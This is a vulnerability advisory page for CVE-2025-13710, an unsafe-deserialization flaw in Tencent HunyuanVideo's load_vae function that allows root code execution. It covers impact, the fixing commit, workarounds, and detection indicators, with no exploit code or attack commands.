CVE-2025-13710
📋 TL;DR
This vulnerability allows remote attackers to execute arbitrary code as root on Tencent HunyuanVideo installations through deserialization of untrusted data in the load_vae function. Attackers can exploit this by tricking users into visiting malicious pages or opening malicious files. Users of Tencent HunyuanVideo are affected.
💻 Affected Systems
- Tencent HunyuanVideo
⚠️ Manual Verification Required
This CVE does not have specific version information in our database, so automatic vulnerability detection cannot determine if your system is affected.
Why? The CVE database entry doesn't specify which versions are vulnerable (no version ranges provided by the vendor/NVD).
🔒 Custom verification scripts are available for registered users. Sign up free to download automated test scripts.
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test if the vulnerability is exploitable in your environment
- Consider updating to the latest version as a precaution
⚠️ Risk & Real-World Impact
Worst Case
Complete system compromise with root-level code execution, leading to data theft, ransomware deployment, or persistent backdoor installation.
Likely Case
Attacker gains root access to affected systems, potentially installing malware, exfiltrating sensitive data, or using the system as a pivot point.
If Mitigated
Limited impact due to network segmentation, application sandboxing, or user privilege restrictions preventing full root access.
🎯 Exploit Status
Exploitation requires user interaction but no authentication. ZDI advisory suggests weaponization is likely given the high impact.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Commit b47e10b95483aa8458b64d23350844c29e91c408
Vendor Advisory: https://github.com/Tencent-Hunyuan/HunyuanVideo/commit/b47e10b95483aa8458b64d23350844c29e91c408
Restart Required: Yes
Instructions:
1. Update to the latest HunyuanVideo version containing commit b47e10b95483aa8458b64d23350844c29e91c408. 2. Restart the HunyuanVideo service. 3. Verify the fix by checking the version.
🔧 Temporary Workarounds
Restrict file access
allLimit user ability to open untrusted files with HunyuanVideo
Network segmentation
allIsolate HunyuanVideo systems from critical networks
🧯 If You Can't Patch
- Implement strict file access controls to prevent users from opening untrusted files with HunyuanVideo
- Deploy application sandboxing or containerization to limit the impact of successful exploitation
🔍 How to Verify
Check if Vulnerable:
Check if HunyuanVideo version is prior to commit b47e10b95483aa8458b64d23350844c29e91c408Check Version:
Check HunyuanVideo version through application interface or configuration filesVerify Fix Applied:
Verify the HunyuanVideo installation includes commit b47e10b95483aa8458b64d23350844c29e91c408📡 Detection & Monitoring
Log Indicators:
- Unusual process execution from HunyuanVideo
- Deserialization errors in application logs
- Root privilege escalation attempts
Network Indicators:
- Outbound connections from HunyuanVideo to suspicious IPs
- Unexpected network traffic patterns
SIEM Query:
process_name:"HunyuanVideo" AND (process_integrity_level:"System" OR parent_process_integrity_level:"Medium")